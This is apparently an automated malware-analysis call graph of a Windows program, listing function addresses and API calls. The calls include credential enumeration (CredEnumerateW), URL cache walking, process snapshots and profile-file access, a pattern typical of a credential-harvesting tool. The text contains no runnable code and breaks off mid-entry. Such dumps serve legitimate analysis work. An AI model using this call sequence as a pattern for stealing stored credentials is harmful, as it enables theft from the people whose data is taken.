37899->37900 37901 4125f0 37900->37901 37902 4125e6 DeleteObject 37900->37902 37904 40b1ab ??3@YAXPAX ??3@YAXPAX 37901->37904 37902->37901 37903->37816 37904->37814 37906 40b640 37905->37906 37907 40b639 ??3@YAXPAX 37905->37907 37908 40b1ab ??3@YAXPAX ??3@YAXPAX 37906->37908 37907->37906 37908->37790 37910 40a83b GetSystemDirectoryW 37909->37910 37911 40a84c wcscpy 37909->37911 37910->37911 37916 409719 wcslen 37911->37916 37914 40a881 LoadLibraryW 37915 40a886 37914->37915 37915->37839 37915->37842 37917 409724 37916->37917 37918 409739 wcscat LoadLibraryW 37916->37918 37917->37918 37919 40972c wcscat 37917->37919 37918->37914 37918->37915 37919->37918 37921 444732 37920->37921 37922 444728 DeleteObject 37920->37922 37932 409cc3 37921->37932 37922->37921 37924 412551 37925 4010f9 37924->37925 37926 401130 37925->37926 37927 401134 GetModuleHandleW LoadIconW 37926->37927 37928 401107 wcsncat 37926->37928 37929 40a7be 37927->37929 37928->37926 37930 40a7d2 37929->37930 37930->37854 37930->37930 37931->37848 37935 409bfd memset wcscpy 37932->37935 37934 409cdb CreateFontIndirectW 37934->37924 37935->37934 37936->37864 37938 40aa14 37937->37938 37939 40aa0a ??3@YAXPAX 37937->37939 37938->37869 37939->37938 37941 40a8eb 37940->37941 37942 40a8df wcslen 37940->37942 37943 40a906 ??3@YAXPAX 37941->37943 37944 40a90f 37941->37944 37942->37941 37945 40a919 37943->37945 37946 4099f4 3 API calls 37944->37946 37947 40a932 37945->37947 37948 40a929 ??3@YAXPAX 37945->37948 37946->37945 37950 4099f4 3 API calls 37947->37950 37949 40a93e memcpy 37948->37949 37949->37864 37951 40a93d 37950->37951 37951->37949 37953 409a41 37952->37953 37954 4099fb malloc 37952->37954 37953->37864 37956 409a37 37954->37956 37957 409a1c 37954->37957 37956->37864 37958 409a30 ??3@YAXPAX 37957->37958 37959 409a20 memcpy 37957->37959 37958->37956 37959->37958 37961 40a9e7 37960->37961 37962 40a9dc ??3@YAXPAX 37960->37962 37963 4099f4 3 API calls 37961->37963 37964 40a9f2 37962->37964 37963->37964 37964->37867 37989 409bca GetModuleFileNameW 37965->37989 37967 40dce6 wcsrchr 37968 40dcf5 37967->37968 37969 40dcf9 wcscat 37967->37969 37968->37969 37969->37875 37990 44db70 37970->37990 37974 40dbfd 37993 4447d9 37974->37993 37977 40dc34 wcscpy wcscpy 38019 40d6f5 37977->38019 37978 40dc1f wcscpy 37978->37977 37981 40d6f5 3 API calls 37982 40dc73 37981->37982 37983 40d6f5 3 API calls 37982->37983 37984 40dc89 37983->37984 37985 40d6f5 3 API calls 37984->37985 37986 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37985->37986 38025 40da80 37986->38025 37989->37967 37991 40dbb4 memset memset 37990->37991 37992 409bca GetModuleFileNameW 37991->37992 37992->37974 37994 4447f4 37993->37994 37995 40dc1b 37994->37995 37996 444807 ??2@YAPAXI 37994->37996 37995->37977 37995->37978 37997 44481f 37996->37997 37998 444873 _snwprintf 37997->37998 37999 4448ab wcscpy 37997->37999 38032 44474a 8 API calls 37998->38032 38001 4448bb 37999->38001 38033 44474a 8 API calls 38001->38033 38003 4448a7 38003->37999 38003->38001 38004 4448cd 38034 44474a 8 API calls 38004->38034 38006 4448e2 38035 44474a 8 API calls 38006->38035 38008 4448f7 38036 44474a 8 API calls 38008->38036 38010 44490c 38037 44474a 8 API calls 38010->38037 38012 444921 38038 44474a 8 API calls 38012->38038 38014 444936 38039 44474a 8 API calls 38014->38039 38016 44494b 38040 44474a 8 API calls 38016->38040 38018 444960 ??3@YAXPAX 38018->37995 38020 44db70 38019->38020 38021 40d702 memset GetPrivateProfileStringW 38020->38021 38022 40d752 38021->38022 38023 40d75c WritePrivateProfileStringW 38021->38023 38022->38023 38024 40d758 38022->38024 38023->38024 38024->37981 38026 44db70 38025->38026 38027 40da8d memset 38026->38027 38028 40daac LoadStringW 38027->38028 38031 40dac6 38028->38031 38030 40dade 38030->37805 38031->38028 38031->38030 38041 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38031->38041 38032->38003 38033->38004 38034->38006 38035->38008 38036->38010 38037->38012 38038->38014 38039->38016 38040->38018 38041->38031 38052 409b98 GetFileAttributesW 38042->38052 38044 40daea 38045 40daef wcscpy wcscpy GetPrivateProfileIntW 38044->38045 38051 40db63 38044->38051 38053 40d65d GetPrivateProfileStringW 38045->38053 38047 40db3e 38054 40d65d GetPrivateProfileStringW 38047->38054 38049 40db4f 38055 40d65d GetPrivateProfileStringW 38049->38055 38051->37806 38052->38044 38053->38047 38054->38049 38055->38051 38091 40eaff 38056->38091 38060 411ae2 memset 38059->38060 38061 411b8f 38059->38061 38131 409bca GetModuleFileNameW 38060->38131 38073 411a8b 38061->38073 38063 411b0a wcsrchr 38064 411b22 wcscat 38063->38064 38065 411b1f 38063->38065 38132 414770 wcscpy wcscpy wcscpy CloseHandle 38064->38132 38065->38064 38067 411b67 38133 402afb 38067->38133 38071 411b7f 38189 40ea13 SendMessageW memset SendMessageW 38071->38189 38074 402afb 27 API calls 38073->38074 38075 411ac0 38074->38075 38076 4110dc 38075->38076 38077 41113e 38076->38077 38082 4110f0 38076->38082 38214 40969c LoadCursorW SetCursor 38077->38214 38079 411143 38215 4032b4 38079->38215 38233 444a54 38079->38233 38080 4110f7 _wcsicmp 38080->38082 38081 411157 38083 40ada2 _wcsicmp 38081->38083 38082->38077 38082->38080 38236 410c46 10 API calls 38082->38236 38086 411167 38083->38086 38084 4111af 38086->38084 38087 4111a6 qsort 38086->38087 38087->38084 38090->37887 38092 40eb10 38091->38092 38104 40e8e0 38092->38104 38095 40eb6c memcpy memcpy 38096 40ebb7 38095->38096 38096->38095 38097 40ebf2 ??2@YAPAXI ??2@YAPAXI 38096->38097 38101 40d134 16 API calls 38096->38101 38098 40ec2e ??2@YAPAXI 38097->38098 38100 40ec65 38097->38100 38098->38100 38114 40ea7f 38100->38114 38101->38096 38103 402f49 38103->37887 38105 40e8f2 38104->38105 38106 40e8eb ??3@YAXPAX 38104->38106 38107 40e900 38105->38107 38108 40e8f9 ??3@YAXPAX 38105->38108 38106->38105 38109 40e911 38107->38109 38110 40e90a ??3@YAXPAX 38107->38110 38108->38107 38111 40e931 ??2@YAPAXI ??2@YAPAXI 38109->38111 38112 40e921 ??3@YAXPAX 38109->38112 38113 40e92a ??3@YAXPAX 38109->38113 38110->38109 38111->38095 38112->38113 38113->38111 38115 40aa04 ??3@YAXPAX 38114->38115 38116 40ea88 38115->38116 38117 40aa04 ??3@YAXPAX 38116->38117 38118 40ea90 38117->38118 38119 40aa04 ??3@YAXPAX 38118->38119 38120 40ea98 38119->38120 38121 40aa04 ??3@YAXPAX 38120->38121 38122 40eaa0 38121->38122 38123 40a9ce 4 API calls 38122->38123 38124 40eab3 38123->38124 38125 40a9ce 4 API calls 38124->38125 38126 40eabd 38125->38126 38127 40a9ce 4 API calls 38126->38127 38128 40eac7 38127->38128 38129 40a9ce 4 API calls 38128->38129 38130 40ead1 38129->38130 38130->38103 38131->38063 38132->38067 38190 40b2cc 38133->38190 38135 402b0a 38136 40b2cc 27 API calls 38135->38136 38137 402b23 38136->38137 38138 40b2cc 27 API calls 38137->38138 38139 402b3a 38138->38139 38140 40b2cc 27 API calls 38139->38140 38141 402b54 38140->38141 38142 40b2cc 27 API calls 38141->38142 38143 402b6b 38142->38143 38144 40b2cc 27 API calls 38143->38144 38145 402b82 38144->38145 38146 40b2cc 27 API calls 38145->38146 38147 402b99 38146->38147 38148 40b2cc 27 API calls 38147->38148 38149 402bb0 38148->38149 38150 40b2cc 27 API calls 38149->38150 38151 402bc7 38150->38151 38152 40b2cc 27 API calls 38151->38152 38153 402bde 38152->38153 38154 40b2cc 27 API calls 38153->38154 38155 402bf5 38154->38155 38156 40b2cc 27 API calls 38155->38156 38157 402c0c 38156->38157 38158 40b2cc 27 API calls 38157->38158 38159 402c23 38158->38159 38160 40b2cc 27 API calls 38159->38160 38161 402c3a 38160->38161 38162 40b2cc 27 API calls 38161->38162 38163 402c51 38162->38163 38164 40b2cc 27 API calls 38163->38164 38165 402c68 38164->38165 38166 40b2cc 27 API calls 38165->38166 38167 402c7f 38166->38167 38168 40b2cc 27 API calls 38167->38168 38169 402c99 38168->38169 38170 40b2cc 27 API calls 38169->38170 38171 402cb3 38170->38171 38172 40b2cc 27 API calls 38171->38172 38173 402cd5 38172->38173 38174 40b2cc 27 API calls 38173->38174 38175 402cf0 38174->38175 38176 40b2cc 27 API calls 38175->38176 38177 402d0b 38176->38177 38178 40b2cc 27 API calls 38177->38178 38179 402d26 38178->38179 38180 40b2cc 27 API calls 38179->38180 38181 402d3e 38180->38181 38182 40b2cc 27 API calls 38181->38182 38183 402d59 38182->38183 38184 40b2cc 27 API calls 38183->38184 38185 402d78 38184->38185 38186 40b2cc 27 API calls 38185->38186 38187 402d93 38186->38187 38188 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38187->38188 38188->38071 38189->38061 38193 40b58d 38190->38193 38192 40b2d1 38192->38135 38194 40b5a4 GetModuleHandleW FindResourceW 38193->38194 38195 40b62e 38193->38195 38196 40b5c2 LoadResource 38194->38196 38198 40b5e7 38194->38198 38195->38192 38197 40b5d0 SizeofResource LockResource 38196->38197 38196->38198 38197->38198 38198->38195 38206 40afcf 38198->38206 38200 40b608 memcpy 38209 40b4d3 memcpy 38200->38209 38202 40b61e 38210 40b3c1 18 API calls 38202->38210 38204 40b626 38211 40b04b 38204->38211 38207 40b04b ??3@YAXPAX 38206->38207 38208 40afd7 ??2@YAPAXI 38207->38208 38208->38200 38209->38202 38210->38204 38212 40b051 ??3@YAXPAX 38211->38212 38213 40b05f 38211->38213 38212->38213 38213->38195 38214->38079 38216 4032c4 38215->38216 38217 40b633 ??3@YAXPAX 38216->38217 38218 403316 38217->38218 38237 44553b 38218->38237 38222 403480 38433 40368c 15 API calls 38222->38433 38224 403489 38225 40b633 ??3@YAXPAX 38224->38225 38226 403495 38225->38226 38226->38081 38227 4033a9 memset memcpy 38228 4033ec wcscmp 38227->38228 38229 40333c 38227->38229 38228->38229 38229->38222 38229->38227 38229->38228 38431 4028e7 11 API calls 38229->38431 38432 40f508 6 API calls 38229->38432 38231 403421 _wcsicmp 38231->38229 38234 444a64 FreeLibrary 38233->38234 38235 444a83 38233->38235 38234->38235 38235->38081 38236->38082 38238 445548 38237->38238 38239 445599 38238->38239 38434 40c768 38238->38434 38241 4455a8 memset 38239->38241 38320 4457f2 38239->38320 38517 403988 38241->38517 38247 4458aa 38249 44594a 38247->38249 38250 4458bb memset memset 38247->38250 38248 445672 38528 403fbe memset memset memset memset memset 38248->38528 38252 4459ed 38249->38252 38253 44595e memset memset 38249->38253 38255 414c2e 15 API calls 38250->38255 38262 445a00 memset memset 38252->38262 38263 445b22 38252->38263 38258 414c2e 15 API calls 38253->38258 38254 4455e5 38254->38248 38266 44560f 38254->38266 38259 4458f9 38255->38259 38256 445854 38256->38247 38642 403c9c memset memset memset memset memset 38256->38642 38264 44599c 38258->38264 38265 40b2cc 27 API calls 38259->38265 38260 44558c 38501 444b06 38260->38501 38665 414c2e 38262->38665 38268 445bca 38263->38268 38269 445b38 memset memset memset 38263->38269 38275 40b2cc 27 API calls 38264->38275 38276 445909 38265->38276 38278 4087b3 337 API calls 38266->38278 38267 445849 38729 40b1ab ??3@YAXPAX ??3@YAXPAX 38267->38729 38277 445c8b memset memset 38268->38277 38333 445cf0 38268->38333 38281 445bd4 38269->38281 38282 445b98 38269->38282 38283 4459ac 38275->38283 38292 409d1f 6 API calls 38276->38292 38284 414c2e 15 API calls 38277->38284 38293 445621 38278->38293 38279 44557a 38279->38260 38714 41366b FreeLibrary 38279->38714 38280 44589f 38730 40b1ab ??3@YAXPAX ??3@YAXPAX 38280->38730 38290 414c2e 15 API calls 38281->38290 38282->38281 38286 445ba2 38282->38286 38295 409d1f 6 API calls 38283->38295 38296 445cc9 38284->38296 38800 4099c6 wcslen 38286->38800 38287 4456b2 38717 40b1ab ??3@YAXPAX ??3@YAXPAX 38287->38717 38288 40b2cc 27 API calls 38299 445a4f 38288->38299 38301 445be2 38290->38301 38291 403335 38430 4452e5 45 API calls 38291->38430 38304 445919 38292->38304 38715 4454bf 20 API calls 38293->38715 38294 445823 38294->38267 38313 4087b3 337 API calls 38294->38313 38306 4459bc 38295->38306 38307 409d1f 6 API calls 38296->38307 38297 445879 38297->38280 38317 4087b3 337 API calls 38297->38317 38680 409d1f wcslen wcslen 38299->38680 38311 40b2cc 27 API calls 38301->38311 38302 445d3d 38331 40b2cc 27 API calls 38302->38331 38303 445d88 memset memset memset 38305 414c2e 15 API calls 38303->38305 38731 409b98 GetFileAttributesW 38304->38731 38314 445dde 38305->38314 38796 409b98 GetFileAttributesW 38306->38796 38316 445ce1 38307->38316 38308 445bb3 38803 445403 memset 38308->38803 38309 445680 38309->38287 38551 4087b3 memset 38309->38551 38321 445bf3 38311->38321 38313->38294 38324 40b2cc 27 API calls 38314->38324 38820 409b98 GetFileAttributesW 38316->38820 38317->38297 38320->38256 38619 403e2d memset memset memset memset memset 38320->38619 38330 409d1f 6 API calls 38321->38330 38322 445928 38322->38249 38732 40b6ef 38322->38732 38332 445def 38324->38332 38325 4459cb 38325->38252 38343 40b6ef 249 API calls 38325->38343 38329 40b2cc 27 API calls 38335 445a94 38329->38335 38337 445c07 38330->38337 38338 445d54 _wcsicmp 38331->38338 38341 409d1f 6 API calls 38332->38341 38333->38291 38333->38302 38333->38303 38334 445389 255 API calls 38334->38268 38685 40ae18 38335->38685 38336 44566d 38336->38320 38602 413d4c 38336->38602 38346 445389 255 API calls 38337->38346 38347 445d71 38338->38347 38408 445d67 38338->38408 38340 445665 38716 40b1ab ??3@YAXPAX ??3@YAXPAX 38340->38716 38349 445e03 38341->38349 38343->38252 38351 445c17 38346->38351 38821 445093 23 API calls 38347->38821 38348 44563c 38348->38340 38353 4087b3 337 API calls 38348->38353 38822 409b98 GetFileAttributesW 38349->38822 38350 4456d8 38356 40b2cc 27 API calls 38350->38356 38357 40b2cc 27 API calls 38351->38357 38353->38348 38355 40b6ef 249 API calls 38355->38291 38361 4456e2 38356->38361 38362 445c23 38357->38362 38358 445d83 38358->38291 38360 445e12 38366 445e6b 38360->38366 38370 40b2cc 27 API calls 38360->38370 38718 413fa6 _wcsicmp _wcsicmp 38361->38718 38364 409d1f 6 API calls 38362->38364 38368 445c37 38364->38368 38365 445b17 38797 40aebe 38365->38797 38824 445093 23 API calls 38366->38824 38367 4456eb 38373 4456fd memset memset memset memset 38367->38373 38374 4457ea 38367->38374 38375 445389 255 API calls 38368->38375 38377 445e33 38370->38377 38719 409c70 wcscpy wcsrchr 38373->38719 38722 413d29 38374->38722 38376 445c47 38375->38376 38382 40b2cc 27 API calls 38376->38382 38383 409d1f 6 API calls 38377->38383 38379 445e7e 38384 445f67 38379->38384 38387 445c53 38382->38387 38388 445e47 38383->38388 38389 40b2cc 27 API calls 38384->38389 38385 445ab2 memset 38390 40b2cc 27 API calls 38385->38390 38386 409c70 2 API calls 38391 44577e 38386->38391 38392 409d1f 6 API calls 38387->38392 38823 409b98 GetFileAttributesW 38388->38823 38394 445f73 38389->38394 38395 445aa1 38390->38395 38396 409c70 2 API calls 38391->38396 38397 445c67 38392->38397 38399 409d1f 6 API calls 38394->38399 38395->38365 38395->38385 38400 409d1f 6 API calls 38395->38400 38692 40add4 38395->38692 38697 445389 38395->38697 38706 40ae51 38395->38706 38401 44578d 38396->38401 38402 445389 255 API calls 38397->38402 38398 445e56 38398->38366 38405 445e83 memset 38398->38405 38403 445f87 38399->38403 38400->38395 38401->38374 38407 40b2cc 27 API calls 38401->38407 38402->38268 38827 409b98 GetFileAttributesW 38403->38827 38409 40b2cc 27 API calls 38405->38409 38410 4457a8 38407->38410 38408->38291 38408->38355 38411 445eab 38409->38411 38412 409d1f 6 API calls 38410->38412 38413 409d1f 6 API calls 38411->38413 38414 4457b8 38412->38414 38415 445ebf 38413->38415 38721 409b98 GetFileAttributesW 38414->38721 38417 40ae18 9 API calls 38415->38417 38425 445ef5 38417->38425 38418 4457c7 38418->38374 38420 4087b3 337 API calls 38418->38420 38419 40ae51 9 API calls 38419->38425 38420->38374 38421 445f5c 38422 40aebe FindClose 38421->38422 38422->38384 38423 40add4 2 API calls 38423->38425 38424 40b2cc 27 API calls 38424->38425 38425->38419 38425->38421 38425->38423 38425->38424 38426 409d1f 6 API calls 38425->38426 38428 445f3a 38425->38428 38825 409b98 GetFileAttributesW 38425->38825 38426->38425 38826 445093 23 API calls 38428->38826 38430->38229 38431->38231 38432->38229 38433->38224 38435 40c775 38434->38435 38828 40b1ab ??3@YAXPAX ??3@YAXPAX 38435->38828 38437 40c788 38829 40b1ab ??3@YAXPAX ??3@YAXPAX 38437->38829 38439 40c790 38830 40b1ab ??3@YAXPAX ??3@YAXPAX 38439->38830 38441 40c798 38442 40aa04 ??3@YAXPAX 38441->38442 38443 40c7a0 38442->38443 38831 40c274 memset 38443->38831 38448 40a8ab 9 API calls 38449 40c7c3 38448->38449 38450 40a8ab 9 API calls 38449->38450 38451 40c7d0 38450->38451 38860 40c3c3 38451->38860 38455 40c877 38464 40bdb0 38455->38464 38456 40c86c 38902 4053fe 39 API calls 38456->38902 38462 40c7e5 38462->38455 38462->38456 38463 40c634 49 API calls 38462->38463 38885 40a706 38462->38885 38463->38462 39092 404363 38464->39092 38467 40bf5d 39112 40440c 38467->39112 38469 40bdee 38469->38467 38472 40b2cc 27 API calls 38469->38472 38470 40bddf CredEnumerateW 38470->38469 38473 40be02 wcslen 38472->38473 38473->38467 38480 40be1e 38473->38480 38474 40be26 _wcsncoll 38474->38480 38477 40be7d memset 38478 40bea7 memcpy 38477->38478 38477->38480 38479 40bf11 wcschr 38478->38479 38478->38480 38479->38480 38480->38467 38480->38474 38480->38477 38480->38478 38480->38479 38481 40b2cc 27 API calls 38480->38481 38483 40bf43 LocalFree 38480->38483 39115 40bd5d 28 API calls 38480->39115 39116 404423 38480->39116 38482 40bef6 _wcsnicmp 38481->38482 38482->38479 38482->38480 38483->38480 38484 4135f7 39129 4135e0 38484->39129 38487 40b2cc 27 API calls 38488 41360d 38487->38488 38489 40a804 8 API calls 38488->38489 38490 413613 38489->38490 38491 41361b 38490->38491 38492 41363e 38490->38492 38493 40b273 27 API calls 38491->38493 38494 4135e0 FreeLibrary 38492->38494 38495 413625 GetProcAddress 38493->38495 38496 413643 38494->38496 38495->38492 38497 413648 38495->38497 38496->38279 38498 413658 38497->38498 38499 4135e0 FreeLibrary 38497->38499 38498->38279 38500 413666 38499->38500 38500->38279 39132 4449b9 38501->39132 38504 4449b9 42 API calls 38505 444b4b 38504->38505 38506 444c15 38505->38506 39153 444972 GetVersionExW 38505->39153 38508 4449b9 42 API calls 38506->38508 38509 444c1f 38508->38509 38509->38239 38510 444b99 memcmp 38515 444b8c 38510->38515 38511 444c0b 39157 444a85 42 API calls 38511->39157 38515->38510 38515->38511 39154 444aa5 42 API calls 38515->39154 39155 40a7a0 GetVersionExW 38515->39155 39156 444a85 42 API calls 38515->39156 38518 40399d 38517->38518 39158 403a16 38518->39158 38520 403a09 39172 40b1ab ??3@YAXPAX ??3@YAXPAX 38520->39172 38522 403a12 wcsrchr 38522->38254 38523 4039a3 38523->38520 38526 4039f4 38523->38526 39169 40a02c CreateFileW 38523->39169 38526->38520 38527 4099c6 2 API calls 38526->38527 38527->38520 38529 414c2e 15 API calls 38528->38529 38530 404048 38529->38530 38531 414c2e 15 API calls 38530->38531 38532 404056 38531->38532 38533 409d1f 6 API calls 38532->38533 38534 404073 38533->38534 38535 409d1f 6 API calls 38534->38535 38536 40408e 38535->38536 38537 409d1f 6 API calls 38536->38537 38538 4040a6 38537->38538 38539 403af5 20 API calls 38538->38539 38540 4040ba 38539->38540 38541 403af5 20 API calls 38540->38541 38542 4040cb 38541->38542 39199 40414f memset 38542->39199 38544 404140 39213 40b1ab ??3@YAXPAX ??3@YAXPAX 38544->39213 38546 4040ec memset 38549 4040e0 38546->38549 38547 404148 38547->38309 38548 4099c6 2 API calls 38548->38549 38549->38544 38549->38546 38549->38548 38550 40a8ab 9 API calls 38549->38550 38550->38549 39226 40a6e6 WideCharToMultiByte 38551->39226 38553 4087ed 39227 4095d9 memset 38553->39227 38556 408809 memset memset memset memset memset 38557 40b2cc 27 API calls 38556->38557 38558 4088a1 38557->38558 38559 409d1f 6 API calls 38558->38559 38560 4088b1 38559->38560 38561 40b2cc 27 API calls 38560->38561 38562 4088c0 38561->38562 38563 409d1f 6 API calls 38562->38563 38564 4088d0 38563->38564 38565 40b2cc 27 API calls 38564->38565 38566 4088df 38565->38566 38567 409d1f 6 API calls 38566->38567 38568 4088ef 38567->38568 38569 40b2cc 27 API calls 38568->38569 38570 4088fe 38569->38570 38571 409d1f 6 API calls 38570->38571 38572 40890e 38571->38572 38573 40b2cc 27 API calls 38572->38573 38574 40891d 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 40892d 38575->38576 39246 409b98 GetFileAttributesW 38576->39246 38578 40893e 38579 408943 38578->38579 38580 408958 38578->38580 39247 407fdf 75 API calls 38579->39247 39248 409b98 GetFileAttributesW 38580->39248 38583 408953 38583->38309 38584 408964 38603 40b633 ??3@YAXPAX 38602->38603 38604 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38603->38604 38605 413f00 Process32NextW 38604->38605 38606 413da5 OpenProcess 38605->38606 38607 413f17 CloseHandle 38605->38607 38608 413eb0 38606->38608 38609 413df3 memset 38606->38609 38607->38350 38608->38605 38611 413ebf ??3@YAXPAX 38608->38611 38612 4099f4 3 API calls 38608->38612 39538 413f27 38609->39538 38611->38608 38612->38608 38613 413e37 GetModuleHandleW 38615 413e46 GetProcAddress 38613->38615 38616 413e1f 38613->38616 38615->38616 38616->38613 39543 413959 38616->39543 39559 413ca4 38616->39559 38618 413ea2 CloseHandle 38618->38608 38620 414c2e 15 API calls 38619->38620 38621 403eb7 38620->38621 38622 414c2e 15 API calls 38621->38622 38623 403ec5 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 403ee2 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 403efd 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 403f15 38628->38629 38630 403af5 20 API calls 38629->38630 38631 403f29 38630->38631 38632 403af5 20 API calls 38631->38632 38633 403f3a 38632->38633 38634 40414f 33 API calls 38633->38634 38640 403f4f 38634->38640 38635 403faf 39573 40b1ab ??3@YAXPAX ??3@YAXPAX 38635->39573 38637 403f5b memset 38637->38640 38638 403fb7 38638->38294 38639 4099c6 2 API calls 38639->38640 38640->38635 38640->38637 38640->38639 38641 40a8ab 9 API calls 38640->38641 38641->38640 38643 414c2e 15 API calls 38642->38643 38644 403d26 38643->38644 38645 414c2e 15 API calls 38644->38645 38646 403d34 38645->38646 38647 409d1f 6 API calls 38646->38647 38648 403d51 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 403d6c 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 403d84 38651->38652 38653 403af5 20 API calls 38652->38653 38654 403d98 38653->38654 38655 403af5 20 API calls 38654->38655 38656 403da9 38655->38656 38657 40414f 33 API calls 38656->38657 38658 403dbe 38657->38658 38659 403e1e 38658->38659 38660 403dca memset 38658->38660 38663 4099c6 2 API calls 38658->38663 38664 40a8ab 9 API calls 38658->38664 39574 40b1ab ??3@YAXPAX ??3@YAXPAX 38659->39574 38660->38658 38662 403e26 38662->38297 38663->38658 38664->38658 38666 414b81 9 API calls 38665->38666 38667 414c40 38666->38667 38668 414c73 memset 38667->38668 39575 409cea 38667->39575 38669 414c94 38668->38669 39578 414592 RegOpenKeyExW 38669->39578 38672 414c64 38672->38288 38674 414cc1 38675 414cf4 wcscpy 38674->38675 39579 414bb0 wcscpy 38674->39579 38675->38672 38677 414cd2 39580 4145ac RegQueryValueExW 38677->39580 38679 414ce9 38679->38675 38681 409d62 38680->38681 38682 409d43 wcscpy 38680->38682 38681->38329 38683 409719 2 API calls 38682->38683 38684 409d51 wcscat 38683->38684 38684->38681 38686 40aebe FindClose 38685->38686 38687 40ae21 38686->38687 38688 4099c6 2 API calls 38687->38688 38689 40ae35 38688->38689 38690 409d1f 6 API calls 38689->38690 38691 40ae49 38690->38691 38691->38395 38693 40ade0 38692->38693 38696 40ae0f 38692->38696 38694 40ade7 wcscmp 38693->38694 38693->38696 38695 40adfe wcscmp 38694->38695 38694->38696 38695->38696 38696->38395 38698 40ae18 9 API calls 38697->38698 38704 4453c4 38698->38704 38699 40ae51 9 API calls 38699->38704 38700 4453f3 38702 40aebe FindClose 38700->38702 38701 40add4 2 API calls 38701->38704 38703 4453fe 38702->38703 38703->38395 38704->38699 38704->38700 38704->38701 38705 445403 250 API calls 38704->38705 38705->38704 38707 40ae7b FindNextFileW 38706->38707 38708 40ae5c FindFirstFileW 38706->38708 38709 40ae94 38707->38709 38710 40ae8f 38707->38710 38708->38709 38712 40aeb6 38709->38712 38713 409d1f 6 API calls 38709->38713 38711 40aebe FindClose 38710->38711 38711->38709 38712->38395 38713->38712 38714->38260 38715->38348 38716->38336 38717->38336 38718->38367 38720 409c89 38719->38720 38720->38386 38721->38418 38723 413d39 38722->38723 38724 413d2f FreeLibrary 38722->38724 38725 40b633 ??3@YAXPAX 38723->38725 38724->38723 38726 413d42 38725->38726 38727 40b633 ??3@YAXPAX 38726->38727 38728 413d4a 38727->38728 38728->38320 38729->38256 38730->38247 38731->38322 38733 44db70 38732->38733 38734 40b6fc memset 38733->38734 38735 409c70 2 API calls 38734->38735 38736 40b732 wcsrchr 38735->38736 38737 40b743 38736->38737 38738 40b746 memset 38736->38738 38737->38738 38739 40b2cc 27 API calls 38738->38739 38740 40b76f 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 40b783 38741->38742 39581 409b98 GetFileAttributesW 38742->39581 38744 40b792 38746 409c70 2 API calls 38744->38746 38759 40b7c2 38744->38759 38747 40b7a5 38746->38747 38749 40b2cc 27 API calls 38747->38749 38752 40b7b2 38749->38752 38750 40b837 FindCloseChangeNotification 38754 40b83e memset 38750->38754 38751 40b817 39616 409a45 GetTempPathW 38751->39616 38755 409d1f 6 API calls 38752->38755 39615 40a6e6 WideCharToMultiByte 38754->39615 38755->38759 38756 40b827 38756->38754 38758 40b866 38760 444432 120 API calls 38758->38760 39582 40bb98 38759->39582 38761 40b879 38760->38761 38762 40bad5 38761->38762 38763 40b273 27 API calls 38761->38763 38765 40b04b ??3@YAXPAX 38762->38765 38764 40b89a 38763->38764 38766 438552 133 API calls 38764->38766 38767 40baf3 38765->38767 38768 40b8a4 38766->38768 38767->38249 38769 40bacd 38768->38769 38771 4251c4 136 API calls 38768->38771 38770 443d90 110 API calls 38769->38770 38770->38762 38793 40b8b8 38771->38793 38772 40bac6 39628 424f26 122 API calls 38772->39628 38773 40b8bd memset 39619 425413 17 API calls 38773->39619 38776 425413 17 API calls 38776->38793 38779 40a71b MultiByteToWideChar 38779->38793 38782 40b9b5 memcmp 38782->38793 38783 4099c6 2 API calls 38783->38793 38784 404423 37 API calls 38784->38793 38786 40bb3e memset memcpy 39629 40a734 MultiByteToWideChar 38786->39629 38788 4251c4 136 API calls 38788->38793 38790 40bb88 LocalFree 38790->38793 38793->38772 38793->38773 38793->38776 38793->38779 38793->38782 38793->38783 38793->38784 38793->38786 38793->38788 38794 40ba5f memcmp 38793->38794 38795 40a734 MultiByteToWideChar 38793->38795 39620 4253ef 16 API calls 38793->39620 39621 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38793->39621 39622 4253af 17 API calls 38793->39622 39623 4253cf 17 API calls 38793->39623 39624 447280 memset 38793->39624 39625 447960 memset memcpy memcpy memcpy 38793->39625 39626 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38793->39626 39627 447920 memcpy memcpy memcpy 38793->39627 38794->38793 38795->38793 38796->38325 38798 40aed1 38797->38798 38799 40aec7 FindClose 38797->38799 38798->38263 38799->38798 38801 4099d7 38800->38801 38802 4099da memcpy 38800->38802 38801->38802 38802->38308 38804 40b2cc 27 API calls 38803->38804 38805 44543f 38804->38805 38806 409d1f 6 API calls 38805->38806 38807 44544f 38806->38807 39716 409b98 GetFileAttributesW 38807->39716 38809 44545e 38810 445476 38809->38810 38811 40b6ef 249 API calls 38809->38811 38812 40b2cc 27 API calls 38810->38812 38811->38810 38813 445482 38812->38813 38814 409d1f 6 API calls 38813->38814 38815 445492 38814->38815 39717 409b98 GetFileAttributesW 38815->39717 38817 4454a1 38818 4454b9 38817->38818 38819 40b6ef 249 API calls 38817->38819 38818->38334 38819->38818 38820->38333 38821->38358 38822->38360 38823->38398 38824->38379 38825->38425 38826->38425 38827->38408 38828->38437 38829->38439 38830->38441 38832 414c2e 15 API calls 38831->38832 38833 40c2ae 38832->38833 38903 40c1d3 38833->38903 38838 40c3be 38855 40a8ab 38838->38855 38839 40afcf 2 API calls 38840 40c2fd FindFirstUrlCacheEntryW 38839->38840 38841 40c3b6 38840->38841 38842 40c31e wcschr 38840->38842 38843 40b04b ??3@YAXPAX 38841->38843 38844 40c331 38842->38844 38845 40c35e FindNextUrlCacheEntryW 38842->38845 38843->38838 38847 40a8ab 9 API calls 38844->38847 38845->38842 38846 40c373 GetLastError 38845->38846 38848 40c3ad FindCloseUrlCache 38846->38848 38849 40c37e 38846->38849 38850 40c33e wcschr 38847->38850 38848->38841 38851 40afcf 2 API calls 38849->38851 38850->38845 38852 40c34f 38850->38852 38853 40c391 FindNextUrlCacheEntryW 38851->38853 38854 40a8ab 9 API calls 38852->38854 38853->38842 38853->38848 38854->38845 39019 40a97a 38855->39019 38858 